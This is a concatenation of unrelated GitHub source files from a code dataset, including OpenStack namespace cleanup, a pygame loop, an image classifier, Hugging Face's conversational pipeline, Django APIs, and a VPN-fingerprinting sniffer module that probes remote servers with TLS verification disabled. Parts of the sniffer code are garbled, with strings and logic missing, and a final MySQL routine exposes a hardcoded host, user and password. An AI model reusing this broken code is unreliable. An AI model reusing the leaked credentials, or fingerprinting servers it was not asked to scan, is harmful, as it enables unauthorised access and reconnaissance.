ovs.get_bridge_for_iface(device.name)\n if bridge_name:\n bridge = ovs_lib.OVSBridge(bridge_name)\n bridge.delete_port(device.name)\n else:\n LOG.debug('Unable to find bridge for device: %s', device.name)\n finally:\n device.set_log_fail_as_error(orig_log_fail_as_error)\n\n\ndef wait_until_no_listen_pids_namespace(namespace, timeout=SIGTERM_WAITTIME):\n \"\"\"Poll listening processes within the given namespace.\n\n If after timeout seconds, there are remaining processes in the namespace,\n then a PidsInNamespaceException will be thrown.\n \"\"\"\n # NOTE(dalvarez): This function can block forever if\n # find_listen_pids_in_namespace never returns which is really unlikely. We\n # can't use wait_until_true because we might get interrupted by eventlet\n # Timeout during our I/O with rootwrap daemon and that will lead to errors\n # in subsequent calls to utils.execute grabbing always the output of the\n # previous command\n start = end = time.time()\n while end - start < timeout:\n if not priv_utils.find_listen_pids_namespace(namespace):\n return\n time.sleep(1)\n end = time.time()\n raise PidsInNamespaceException\n\n\ndef _kill_listen_processes(namespace, force=False):\n \"\"\"Identify all listening processes within the given namespace.\n\n Then, for each one, find its top parent with same cmdline (in case this\n process forked) and issue a SIGTERM to all of them. If force is True,\n then a SIGKILL will be issued to all parents and all their children. Also,\n this function returns the number of listening processes.\n \"\"\"\n pids = priv_utils.find_listen_pids_namespace(namespace)\n pids_to_kill = {utils.find_fork_top_parent(pid) for pid in pids}\n kill_signal = signal.SIGTERM\n if force:\n kill_signal = signal.SIGKILL\n children = [utils.find_child_pids(pid, True) for pid in pids_to_kill]\n pids_to_kill.update(itertools.chain.from_iterable(children))\n\n for pid in pids_to_kill:\n # Throw a warning since this particular cleanup may need a specific\n # implementation in the right module. Ideally, netns_cleanup wouldn't\n # kill any processes as the responsible module should've killed them\n # before cleaning up the namespace\n LOG.warning(\"Killing (%(signal)d) [%(pid)s] %(cmdline)s\",\n {'signal': kill_signal,\n 'pid': pid,\n 'cmdline': ' '.join(utils.get_cmdline_from_pid(pid))[:80]\n })\n try:\n utils.kill_process(pid, kill_signal, run_as_root=True)\n except Exception as ex:\n LOG.error('An error occurred while killing '\n '[%(pid)s]: %(msg)s', {'pid': pid, 'msg': ex})\n return len(pids)\n\n\ndef kill_listen_processes(namespace):\n \"\"\"Kill all processes listening within the given namespace.\n\n First it tries to kill them using SIGTERM, waits until they die gracefully\n and then kills remaining processes (if any) with SIGKILL\n \"\"\"\n if _kill_listen_processes(namespace, force=False):\n try:\n wait_until_no_listen_pids_namespace(namespace)\n except PidsInNamespaceException:\n _kill_listen_processes(namespace, force=True)\n # Allow some time for remaining processes to die\n wait_until_no_listen_pids_namespace(namespace)\n\n\ndef destroy_namespace(conf, namespace, force=False):\n \"\"\"Destroy a given namespace.\n\n If force is True, then dhcp (if it exists) will be disabled and all\n devices will be forcibly removed.\n \"\"\"\n\n try:\n ip = ip_lib.IPWrapper(namespace=namespace)\n\n if force:\n kill_dhcp(conf, namespace)\n # NOTE: The dhcp driver will remove the namespace if is it empty,\n # so a second check is required here.\n if ip.netns.exists(namespace):\n try:\n kill_listen_processes(namespace)\n except PidsInNamespaceException:\n # This is unlikely since, at this point, we have SIGKILLed\n # all remaining processes but if there are still some, log\n # the error and continue with the cleanup\n LOG.error('Not all processes were killed in %s',\n namespace)\n for device in ip.get_devices():\n unplug_device(device)\n\n ip.garbage_collect_namespace()\n except Exception:\n LOG.exception('Error unable to destroy namespace: %s', namespace)\n\n\ndef cleanup_network_namespaces(conf):\n # Identify namespaces that are candidates for deletion.\n candidates = [ns for ns in\n ip_lib.list_network_namespaces()\n if eligible_for_deletion(conf, ns, conf.force)]\n\n if candidates:\n time.sleep(2)\n\n for namespace in candidates:\n destroy_namespace(conf, namespace, conf.force)\n\n\ndef main():\n \"\"\"Main method for cleaning up network namespaces.\n\n This method will make two passes checking for namespaces to delete. The\n process will identify candidates, sleep, and call garbage collect. The\n garbage collection will re-verify that the namespace meets the criteria for\n deletion (ie it is empty). The period of sleep and the 2nd pass allow\n time for the namespace state to settle, so that the check prior deletion\n will re-confirm the namespace is empty.\n\n The utility is designed to clean-up after the forced or unexpected\n termination of Neutron agents.\n\n The --force flag should only be used as part of the cleanup of a devstack\n installation as it will blindly purge namespaces and their devices. This\n option also kills any lingering DHCP instances.\n \"\"\"\n conf = setup_conf()\n conf()\n config.setup_logging()\n agent_config.setup_privsep()\n cleanup_network_namespaces(conf)\n","repo_name":"openstack/neutron","sub_path":"neutron/cmd/netns_cleanup.py","file_name":"netns_cleanup.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"1362495071","text":"import pygame\nfrom modules.states.main_menu import *\nfrom modules.states.game_mode_menu import *\nfrom modules.states.levels.test_level import *\n\nclass Game:\n\tdef __init__(self, display):\n\t\tself.display_surface = pygame.display.get_surface()\n\n\t\tpygame.font.init()\n\n\t\tself.display = display # Display.py instance.\n\n\t\tself.delta_time = 0\n\n\t\tself.current_state = MainMenu(self)\n\n\t\tself.states = {\n\t\t\t\"MainMenu\" : MainMenu,\n\t\t\t\"GameModeMenu\" : GameModeMenu,\n\t\t\t\n\t\t\t\"TestLevel\" : TestLevel\n\t\t}\n\n\t\tself.state = \"MainMenu\"\n\n\tdef update(self, dt):\n\t\tself.delta_time = dt\n\n\t\tself.current_state.update(self.delta_time)\n\n\tdef change_state(self, state): # Change the state and init the state\n\t\tself.state = state\n\t\tdel self.current_state\n\t\tself.current_state = self.states[self.state](self)\n","repo_name":"Acaippa/pygame-lawnmower","sub_path":"ver 0.3/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40749520705","text":"import cv2\nimport numpy as np\nfrom keras.models import load_model\n\n\n# Classify fresh/rotten\ndef print_fresh(res):\n threshold_fresh = 0.10 # set according to standards\n threshold_medium = 0.35 # set according to standards\n if res < threshold_fresh:\n print(\"The item is FRESH!\")\n elif threshold_fresh < res < threshold_medium:\n print(\"The item is MEDIUM FRESH\")\n else:\n print(\"The item is NOT FRESH\")\n\n\ndef pre_proc_img(image_path):\n # Read the image using OpenCV\n img = cv2.imread(image_path)\n img = cv2.resize(img, (100, 100))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n # Preprocess the image\n img = img / 255.0\n img = np.expand_dims(img, axis=0)\n return img\n\n\ndef evaluate_rotten_vs_fresh(image_path):\n # Load the trained model\n model = load_model('trained-freshness-model.h5')\n\n # Read and process and predict\n prediction = model.predict(pre_proc_img(image_path))\n\n return prediction[0][0]\n\n\n# Example usage:\nimg_path = 'image-to-eval.png'\nis_rotten = evaluate_rotten_vs_fresh(img_path)\nprint(f'Prediction: {is_rotten}',print_fresh(is_rotten))\n","repo_name":"captraj/fruit-veg-freshness-ai","sub_path":"evaluate-image.py","file_name":"evaluate-image.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16832580154","text":"import yaml\n\n\nclass ADNetConf:\n conf = None\n\n @staticmethod\n def get(cfg=None):\n if cfg is not None:\n ADNetConf.conf = ADNetConf(cfg)\n return ADNetConf.conf\n\n @staticmethod\n def g():\n return ADNetConf.get()\n\n def __init__(self, path):\n if path:\n with open(path, 'r') as fp:\n self.conf = yaml.load(fp, Loader=yaml.FullLoader)\n\n def __getitem__(self, key):\n return self.conf[key]\n \nif __name__ == '__main__':\n ADNetConf.get('dylan.yaml')\n print(ADNetConf.get()['dl_paras']['zoom_scale'])\n print(ADNetConf.conf.__dict__)\n\n","repo_name":"dinglijay/ImitateTracking","sub_path":"conf/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10749664145","text":"from contextlib import closing\nfrom urllib.parse import urlsplit, parse_qs\nfrom requests import exceptions as rex\nimport re\nimport attr\nimport ssl\nimport socket\ntry:\n import dtls\n dtls.do_patch()\nexcept ImportError:\n dtls = None\n\n\n@attr.s\nclass Hit(object):\n def __bool__(self):\n return self.confidence > 0.0\n\n def __str__(self):\n return self.name + (' ({})'.format(self.details) if self.details else '')\n\n @property\n def details(self):\n strings = []\n if self.version:\n strings.append(self.version)\n if self.components:\n strings.append('+'.join(self.components))\n if self.confidence < 1.0:\n strings.append('%d%%' % (self.confidence * 100))\n return ', '.join(strings)\n\n name = attr.ib()\n confidence = attr.ib(default=1.0, validator=attr.validators.instance_of(float))\n version = attr.ib(default=None)\n components = attr.ib(default=None)\n\n\ndef _meaningless(x, *vals):\n if x not in vals:\n return x\n\n\n\ndef server_split(host_and_maybe_port):\n rest, *last = host_and_maybe_port.rsplit(':', 1)\n if not last:\n host, port = rest, 443\n elif ']' in last: # we mis-split an IPv6 address, something like '[2601::1234]':\n host, port = host_and_maybe_port, 443\n else:\n host, port = rest, int(last[0])\n return host, port\n\n\n#####\n# Sniffers based on protocol details\n#####\n\ndef global_protect(sess, server):\n '''PAN GlobalProtect'''\n # with closing(sess.get('https://{}/ssl-tunnel-connect.sslvpn'.format(server), stream=True)) as r:\n # if r.status_code==502:\n # components.append('gateway')\n\n components = []\n version = confidence = None\n\n for component, path in (('portal', 'global-protect'), ('gateway', 'ssl-vpn')):\n r = sess.post('https://{}/{}/prelogin.esp?tmp=tmp&clientVer=4100&clientos=Windows'.format(server, path),\n headers={'user-agent': 'PAN GlobalProtect'})\n if r.headers.get('content-type', '').startswith('application/xml') and b'' in r.content:\n confidence = 1.0\n\n if b'Success' in r.content:\n components.append(component)\n if 'gateway' in components:\n # Gateway servers return '502 Bad Gateway' when they don't like the user/authcookie parameters\n # for the SSL tunnel. It's theoretically possible, but I've literally never seen a gateway server\n # that doesn't use the standard SSL tunnel path.\n with closing(sess.get('https://{}/ssl-tunnel-connect.sslvpn?user=&authcookie='.format(server))) as r:\n if r.status_code != 502:\n confidence = 0.8\n elif b'Error' in r.content and b'Valid client certificate is required' in r.content:\n components.append(component)\n components.append(component + ' wants ccert')\n\n m = re.search(rb'([^<]+)', r.content)\n if m:\n saml = '%s wants SAML %s' % (component, m.group(1).decode())\n components.append(saml)\n\n m = re.search(rb'([^<]+)', r.content)\n if m:\n version = m.group(1).decode()\n\n if confidence:\n return Hit(name='PAN GlobalProtect', components=components, version=_meaningless(version, '1'), confidence=confidence)\n\n\ndef check_point(sess, server):\n '''Check Point'''\n confidence = protocols = None\n\n # ClientHello HTTP request in Check Point's parenthesis-heavy format\n r = sess.post('https://{}/clients'.format(server),\n data=b'(CCCclientRequest\\n:RequestHeader (\\n:id (1)\\n:session_id ()\\n:type (ClientHello)\\n:protocol_version (100)\\n)\\n:RequestData (\\n:client_info (\\n:client_type (TRAC)\\n:client_version (0)\\n)\\n)\\n)\\n')\n if r.content.startswith(b'(CCCserverResponse'):\n confidence = 1.0\n protocols = re.search(rb':supported_data_tunnel_protocols\\s*\\(((?:\\s*:\\s*\\([^\\)]+\\))*\\s*\\))', r.content, re.M)\n if protocols:\n protocols = [b.decode() for b in re.findall(rb'\\(([^\\)]+)\\)', protocols.group(1))]\n\n # ClientHello request over bare TLS in Check Point's format\n if not confidence:\n sock = socket.socket(socket.AF_INET)\n sock.settimeout(sess.timeout)\n context = ssl._create_unverified_context()\n conn = context.wrap_socket(sock)\n\n client_hello = b'(client_hello\\n:client_version (1)\\n:protocol_version (1)\\n:OM (\\n:ipaddr (0.0.0.0)\\n:keep_address (false)\\n)\\n:optional (\\n:client_type (4)\\n)\\n:cookie (ff)\\n)\\n'\n client_hello = bytes((0, 0, 0, len(client_hello), 0, 0, 0, 1)) + client_hello # Add length and packet-type prefix\n with closing(conn):\n conn.connect(server_split(server))\n conn.write(client_hello)\n resp = conn.recv(19)\n if resp[4:19] == b'\\0\\0\\0\\x01(disconnect':\n confidence = 1.0\n protocols = ('SSL',)\n\n return confidence and Hit(name='Check Point', confidence=confidence, components=protocols)\n\n\ndef sstp(sess, server):\n '''SSTP'''\n # Yes, this is for real...\n # See section 3.2.4.1 of v17.0 doc at https://msdn.microsoft.com/en-us/library/cc247338.aspx\n\n with closing(sess.request('SSTP_DUPLEX_POST', 'https://{}/sra_%7BBA195980-CD49-458b-9E23-C84EE0ADCD75%7D/'.format(server), stream=True)) as r:\n if r.status_code == 200 and r.headers.get('content-length') == '18446744073709551615':\n version = _meaningless(r.headers.get('server'), \"Microsoft-HTTPAPI/2.0\")\n return Hit(name='SSTP', version=version)\n\n\ndef anyconnect(sess, server):\n '''AnyConnect/OpenConnect'''\n\n platform = 'win'\n config_payload = (\n '\\n'\n ''\n '{}'\n 'https://{}'.format(platform, server))\n\n components = []\n xml_post_ok = None\n\n # Use XML-post auth to check for client cert requirement\n # (This may actually vary by auth-group, but we don't try to enumerate the auth-groups)\n try:\n r = sess.post('https://{}/'.format(server), data=config_payload, headers={\n 'X-Aggregate-Auth': '1', 'X-Transcend-Version': '1'})\n if b'v6.2?'\n elif r.status_code == 302 and re.search(r'/remote/login', r.headers.get('location', '')):\n # Older FortiGate versions (we think) respond to invalid/expired SVPNCOOKIE thusly\n confidence = 1.0\n version = ((version + '; ') if version else '') + 'FortiGate >8, len(client_hello) & 0xff)) + client_hello # Add length prefix (be16)\n with closing(conn):\n conn.connect(server_split(server))\n conn.write(client_hello)\n resp = conn.recv()\n if resp[0] == (len(resp)>>8) and resp[1] == (len(resp)&0xff) and resp[2:9] == b'GFtype\\0':\n confidence = 1.0\n dtls = True\n\n return Hit(name='Fortinet', confidence=confidence, version=version, components=(['DTLS'] if dtls else None))\n\n\ndef sonicwall_nx(sess, server):\n '''SonicWall NX (formerly Dell)'''\n\n sess.cookies.set(domain=server, name='EXTRAWEB_REFERER', value='/preauthMI/microinterrogator.js')\n with closing(sess.get('https://{}/sslvpnclient?launchplatform=mac&neProto=3&supportipv6=yes'.format(server), stream=True,\n headers={\"X-SSLVPN-PROTOCOL\": \"2.0\", \"X-SSLVPN-SERVICE\": \"NETEXTENDER\", \"X-NE-PROTOCOL\": \"2.0\"})) as r:\n if 'EXTRAWEB_STATE' in sess.cookies and 400 <= r.status_code < 500:\n server = r.headers.get('server')\n return Hit(name='SonixWall NX', confidence=0.8, version=server)\n\n\ndef aruba_via(sess, server):\n '''Aruba VIA'''\n\n # server sets *empty* SESSION cookie and returns 401 invalid\n r = sess.get('https://{}'.format(server))\n if r.status_code == 401 and r.headers.get('set-cookie', '').startswith('SESSION'):\n confidence = 0.5 if 'Aruba Networks' in r.text else 0.3\n r = sess.get('https://{}/screens/wms/wms.login'.format(server))\n if r.status_code == 200 and r.headers.get('set-cookie', '').startswith('SESSION'):\n confidence += 0.3\n\n return Hit(name='Aruba VIA', confidence=confidence)\n\n\ndef h3c(sess, server):\n '''H3C TLS VPN'''\n r = sess.get('https://{}/svpn/index.cgi'.format(server), headers={'user-agent': 'SSLVPN-Client/3.0'})\n if '' in r.text:\n # HTML/XML page containing server information, including auth methods\n server = r.headers.get('server')\n return Hit(name='H3C', confidence=0.9 if server == 'SSLVPN-Gateway/7.0' else 0.8,\n version=_meaningless(server, 'SSLVPN-Gateway/7.0'))\n\n\ndef huawei(sess, server):\n '''Huawei SSL VPN'''\n r = sess.post('https://{}/login.html'.format(server), data={'UserName': '', 'Password': ''}, allow_redirects=False)\n final_url = urlsplit(r.headers.get('location', ''))\n if final_url.path.split('/')[-1] == 'relogin.html':\n # Server sends a bizarrely-formatted set-cookie header like 'Set-Cookie: UserID=0&SVN_SessionID='\n # HTTP cookie names aren't supposed to contain ampersands like this.\n bizarre_cookie = r.headers.get('set-cookie', '').startswith('UserID=') and '&' in r.headers.get('set-cookie', '')\n return Hit(name='Huawei',\n confidence = 0.4 + (0.2 if parse_qs(final_url.query).get('ReloginCause') else 0) + (0.4 if bizarre_cookie else 0))\n\n\nsniffers = [\n anyconnect,\n juniper_pulse,\n juniper_secure_connect,\n global_protect,\n barracuda,\n check_point,\n sstp,\n openvpn,\n fortinet,\n array_networks,\n f5_bigip,\n sonicwall_nx,\n aruba_via,\n h3c,\n huawei,\n]\n","repo_name":"dlenski/what-vpn","sub_path":"what_vpn/sniffers.py","file_name":"sniffers.py","file_ext":"py","file_size_in_byte":17324,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"27660099070","text":"# гипотенуза\n\nimport math\nCAT_A = 16\nCAT_B = 12\nGIP = (CAT_A ** 2) + (CAT_B ** 2)\nprint(math.sqrt(GIP))\n# площадь\n\nS = (CAT_A * CAT_B) / int(2)\nprint(S)\n","repo_name":"eugene-okulik/QAP-08onl","sub_path":"homework/Anastasiya_Botukh/Homework_3/ex_4.py","file_name":"ex_4.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42295907558","text":"import uuid\nfrom typing import Any, Dict, List, Union\n\nfrom ..utils import add_end_docstrings, is_tf_available, is_torch_available, logging\nfrom .base import PIPELINE_INIT_ARGS, Pipeline\n\n\nif is_tf_available():\n import tensorflow as tf\n\nif is_torch_available():\n import torch\n\n\nlogger = logging.get_logger(__name__)\n\n\nclass Conversation:\n \"\"\"\n Utility class containing a conversation and its history. This class is meant to be used as an input to the\n [`ConversationalPipeline`]. The conversation contains several utility functions to manage the addition of new user\n inputs and generated model responses.\n\n Arguments:\n messages (Union[str, List[Dict[str, str]]], *optional*):\n The initial messages to start the conversation, either a string, or a list of dicts containing \"role\" and\n \"content\" keys. If a string is passed, it is interpreted as a single message with the \"user\" role.\n conversation_id (`uuid.UUID`, *optional*):\n Unique identifier for the conversation. If not provided, a random UUID4 id will be assigned to the\n conversation.\n\n Usage:\n\n ```python\n conversation = Conversation(\"Going to the movies tonight - any suggestions?\")\n conversation.add_message({\"role\": \"assistant\", \"content\": \"The Big lebowski.\"})\n conversation.add_message({\"role\": \"user\", \"content\": \"Is it good?\"})\n ```\"\"\"\n\n def __init__(\n self, messages: Union[str, List[Dict[str, str]]] = None, conversation_id: uuid.UUID = None, **deprecated_kwargs\n ):\n if not conversation_id:\n conversation_id = uuid.uuid4()\n\n if messages is None:\n text = deprecated_kwargs.pop(\"text\", None)\n if text is not None:\n messages = [{\"role\": \"user\", \"content\": text}]\n else:\n messages = []\n elif isinstance(messages, str):\n messages = [{\"role\": \"user\", \"content\": messages}]\n\n # This block deals with the legacy args - new code should just totally\n # avoid past_user_inputs and generated_responses\n generated_responses = deprecated_kwargs.pop(\"generated_responses\", None)\n past_user_inputs = deprecated_kwargs.pop(\"past_user_inputs\", None)\n if generated_responses is not None and past_user_inputs is None:\n raise ValueError(\"generated_responses cannot be passed without past_user_inputs!\")\n if past_user_inputs is not None:\n legacy_messages = []\n if generated_responses is None:\n generated_responses = []\n # We structure it this way instead of using zip() because the lengths may differ by 1\n for i in range(max([len(past_user_inputs), len(generated_responses)])):\n if i < len(past_user_inputs):\n legacy_messages.append({\"role\": \"user\", \"content\": past_user_inputs[i]})\n if i < len(generated_responses):\n legacy_messages.append({\"role\": \"assistant\", \"content\": generated_responses[i]})\n messages = legacy_messages + messages\n\n self.uuid = conversation_id\n self.messages = messages\n\n def __eq__(self, other):\n if not isinstance(other, Conversation):\n return False\n return self.uuid == other.uuid or self.messages == other.messages\n\n def add_message(self, message: Dict[str, str]):\n if not set(message.keys()) == {\"role\", \"content\"}:\n raise ValueError(\"Message should contain only 'role' and 'content' keys!\")\n if message[\"role\"] not in (\"user\", \"assistant\", \"system\"):\n raise ValueError(\"Only 'user', 'assistant' and 'system' roles are supported for now!\")\n self.messages.append(message)\n\n def add_user_input(self, text: str, overwrite: bool = False):\n \"\"\"\n Add a user input to the conversation for the next round. This is a legacy method that assumes that inputs must\n alternate user/assistant/user/assistant, and so will not add multiple user messages in succession. We recommend\n just using `add_message` with role \"user\" instead.\n \"\"\"\n if len(self) > 0 and self[-1][\"role\"] == \"user\":\n if overwrite:\n logger.warning(\n f'User input added while unprocessed input was existing: \"{self[-1][\"content\"]}\" was overwritten '\n f'with: \"{text}\".'\n )\n self[-1][\"content\"] = text\n else:\n logger.warning(\n f'User input added while unprocessed input was existing: \"{self[-1][\"content\"]}\" new input '\n f'ignored: \"{text}\". Set `overwrite` to True to overwrite unprocessed user input'\n )\n else:\n self.messages.append({\"role\": \"user\", \"content\": text})\n\n def append_response(self, response: str):\n \"\"\"\n This is a legacy method. We recommend just using `add_message` with an appropriate role instead.\n \"\"\"\n self.messages.append({\"role\": \"assistant\", \"content\": response})\n\n def mark_processed(self):\n \"\"\"\n This is a legacy method that no longer has any effect, as the Conversation no longer distinguishes between\n processed and unprocessed user input.\n \"\"\"\n pass\n\n def __iter__(self):\n for message in self.messages:\n yield message\n\n def __getitem__(self, item):\n return self.messages[item]\n\n def __setitem__(self, key, value):\n self.messages[key] = value\n\n def __len__(self):\n return len(self.messages)\n\n def __repr__(self):\n \"\"\"\n Generates a string representation of the conversation.\n\n Returns:\n `str`:\n\n Example:\n Conversation id: 7d15686b-dc94-49f2-9c4b-c9eac6a1f114 user: Going to the movies tonight - any suggestions?\n bot: The Big Lebowski\n \"\"\"\n output = f\"Conversation id: {self.uuid}\\n\"\n for message in self.messages:\n output += f\"{message['role']}: {message['content']}\\n\"\n return output\n\n def iter_texts(self):\n # This is a legacy method for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n for message in self.messages:\n yield message[\"role\"] == \"user\", message[\"content\"]\n\n @property\n def _user_messages(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return [message[\"content\"] for message in self.messages if message[\"role\"] == \"user\"]\n\n @property\n def past_user_inputs(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return self._user_messages[:-1]\n\n @property\n def generated_responses(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return [message[\"content\"] for message in self.messages if message[\"role\"] == \"assistant\"]\n\n @property\n def new_user_input(self):\n # This is a legacy property for backwards compatibility. It is recommended to just directly access\n # conversation.messages instead.\n return self._user_messages[-1]\n\n\n@add_end_docstrings(\n PIPELINE_INIT_ARGS,\n r\"\"\"\n min_length_for_response (`int`, *optional*, defaults to 32):\n The minimum length (in number of tokens) for a response.\n minimum_tokens (`int`, *optional*, defaults to 10):\n The minimum length of tokens to leave for a response.\n \"\"\",\n)\nclass ConversationalPipeline(Pipeline):\n \"\"\"\n Multi-turn conversational pipeline.\n\n Example:\n\n ```python\n >>> from transformers import pipeline, Conversation\n\n >>> chatbot = pipeline(model=\"microsoft/DialoGPT-medium\")\n >>> conversation = Conversation(\"Going to the movies tonight - any suggestions?\")\n >>> conversation = chatbot(conversation)\n >>> conversation.generated_responses[-1]\n 'The Big Lebowski'\n\n >>> conversation.add_user_input(\"Is it an action movie?\")\n >>> conversation = chatbot(conversation)\n >>> conversation.generated_responses[-1]\n \"It's a comedy.\"\n ```\n\n Learn more about the basics of using a pipeline in the [pipeline tutorial](../pipeline_tutorial)\n\n This conversational pipeline can currently be loaded from [`pipeline`] using the following task identifier:\n `\"conversational\"`.\n\n The models that this pipeline can use are models that have been fine-tuned on a multi-turn conversational task,\n currently: *'microsoft/DialoGPT-small'*, *'microsoft/DialoGPT-medium'*, *'microsoft/DialoGPT-large'*. See the\n up-to-date list of available models on\n [huggingface.co/models](https://huggingface.co/models?filter=conversational).\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if self.tokenizer.pad_token_id is None:\n self.tokenizer.pad_token = self.tokenizer.eos_token\n\n def _sanitize_parameters(\n self, min_length_for_response=None, minimum_tokens=None, clean_up_tokenization_spaces=None, **generate_kwargs\n ):\n preprocess_params = {}\n forward_params = {}\n postprocess_params = {}\n\n if min_length_for_response is not None:\n preprocess_params[\"min_length_for_response\"] = min_length_for_response\n if minimum_tokens is not None:\n forward_params[\"minimum_tokens\"] = minimum_tokens\n\n if \"max_length\" in generate_kwargs:\n forward_params[\"max_length\"] = generate_kwargs[\"max_length\"]\n # self.max_length = generate_kwargs.get(\"max_length\", self.model.config.max_length)\n if clean_up_tokenization_spaces is not None:\n postprocess_params[\"clean_up_tokenization_spaces\"] = clean_up_tokenization_spaces\n\n if generate_kwargs:\n forward_params.update(generate_kwargs)\n return preprocess_params, forward_params, postprocess_params\n\n def __call__(self, conversations: Union[Conversation, List[Conversation]], num_workers=0, **kwargs):\n r\"\"\"\n Generate responses for the conversation(s) given as inputs.\n\n Args:\n conversations (a [`Conversation`] or a list of [`Conversation`]):\n Conversations to generate responses for.\n clean_up_tokenization_spaces (`bool`, *optional*, defaults to `False`):\n Whether or not to clean up the potential extra spaces in the text output.\n generate_kwargs:\n Additional keyword arguments to pass along to the generate method of the model (see the generate method\n corresponding to your framework [here](./model#generative-models)).\n\n Returns:\n [`Conversation`] or a list of [`Conversation`]: Conversation(s) with updated generated responses for those\n containing a new user input.\n \"\"\"\n # XXX: num_workers==0 is required to be backward compatible\n # Otherwise the threads will require a Conversation copy.\n # This will definitely hinder performance on GPU, but has to be opted\n # in because of this BC change.\n outputs = super().__call__(conversations, num_workers=num_workers, **kwargs)\n if isinstance(outputs, list) and len(outputs) == 1:\n return outputs[0]\n return outputs\n\n def preprocess(self, conversation: Conversation, min_length_for_response=32) -> Dict[str, Any]:\n input_ids = self.tokenizer.apply_chat_template(conversation, add_generation_prompt=True)\n\n if self.framework == \"pt\":\n input_ids = torch.LongTensor([input_ids])\n elif self.framework == \"tf\":\n input_ids = tf.constant([input_ids])\n return {\"input_ids\": input_ids, \"conversation\": conversation}\n\n def _forward(self, model_inputs, minimum_tokens=10, **generate_kwargs):\n max_length = generate_kwargs.get(\"max_length\", self.model.config.max_length)\n\n n = model_inputs[\"input_ids\"].shape[1]\n if max_length - minimum_tokens < n:\n logger.warning(\n f\"Conversation input is too long ({n}), trimming it to {max_length - minimum_tokens} tokens. Consider increasing `max_length` to avoid truncation.\"\n )\n trim = max_length - minimum_tokens\n model_inputs[\"input_ids\"] = model_inputs[\"input_ids\"][:, -trim:]\n if \"attention_mask\" in model_inputs:\n model_inputs[\"attention_mask\"] = model_inputs[\"attention_mask\"][:, -trim:]\n conversation = model_inputs.pop(\"conversation\")\n generate_kwargs[\"max_length\"] = max_length\n output_ids = self.model.generate(**model_inputs, **generate_kwargs)\n if self.model.config.is_encoder_decoder:\n start_position = 1\n else:\n start_position = n\n return {\"output_ids\": output_ids[:, start_position:], \"conversation\": conversation}\n\n def postprocess(self, model_outputs, clean_up_tokenization_spaces=True):\n output_ids = model_outputs[\"output_ids\"]\n answer = self.tokenizer.decode(\n output_ids[0],\n skip_special_tokens=True,\n clean_up_tokenization_spaces=clean_up_tokenization_spaces,\n )\n conversation = model_outputs[\"conversation\"]\n conversation.add_message({\"role\": \"assistant\", \"content\": answer})\n return conversation\n","repo_name":"Marker-Inc-Korea/KoNEFTune","sub_path":"kosy_transformers/pipelines/conversational.py","file_name":"conversational.py","file_ext":"py","file_size_in_byte":13582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"72752228714","text":"from base.api import BaseApi\nfrom account.controllers import permission as permission_ctl\n\n\nclass CreatePermissionApi(BaseApi):\n\n need_params = {\n 'mod_id': ('模块ID', 'required int'),\n 'name': ('名称', 'required str 32'),\n 'sign': ('标识', 'required str 128'),\n 'typ': ('类型', 'required int'),\n 'rank': ('排序值', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.create_permission(**params)\n\n\nclass UpdatePermissionApi(BaseApi):\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n 'name': ('名称', 'required str 32'),\n 'sign': ('标识', 'required str 128'),\n 'typ': ('类型', 'required int'),\n 'rank': ('排序值', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.update_permission(**params)\n\n\nclass DeletePermissionApi(BaseApi):\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n }\n def post(self, request, params):\n permission_ctl.delete_permission(**params)\n\n\nclass ListPermissionApi(BaseApi):\n NEED_PERMISSION = False\n\n need_params = {\n 'mod_id': ('模块ID', 'optional int'),\n 'typ': ('类型', 'optional int'),\n 'keyword': ('关键字', 'optional str'),\n 'page_num': ('页码', 'optional int'),\n 'page_size': ('页容量', 'optional int'),\n }\n def get(self, request, params):\n data = permission_ctl.get_permissions(**params)\n return data\n\n\nclass PermissionApi(BaseApi):\n NEED_PERMISSION = False\n\n need_params = {\n 'obj_id': ('权限ID', 'required int'),\n }\n\n def get(self, request, params):\n data = permission_ctl.get_permission(**params)\n return data\n","repo_name":"bxxfighting/rurality","sub_path":"account/apis/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"27943722000","text":"import MySQLdb\nimport copy\nimport time\nimport sys \nimport traceback \nimport modules as mo\ng_conn = None\n#lock\n\n\ndef db_init():\n\t\tglobal g_conn\n\t\tret = None\n\t\tfor i in range(3):\n\t\t\t\ttry:\n\t\t\t\t\t\tmo.logger.info( \"[conn]%s_%s_%s_%s %d.\"%(\"192.168.12.19\",\"caiji\",\"()zk4DW{\",\"resource\",i) )\n\t\t\t\t\t\tg_conn=MySQLdb.connect(host=\"192.168.12.19\",user=\"caiji\",passwd=\"()zk4DW{\",db=\"resource\",port=3306,charset='utf8')\n\t\t\t\t\t\treturn True,None\n\t\t\t\texcept:\n\t\t\t\t\t\tret = str(sys.exc_info()) + \"; \" + str(traceback.format_exc()) \n\t\t\t\t\t\tmo.logger.error( ret )\n\t\t\t\t\t\t#time.sleep(1)\n\t\treturn 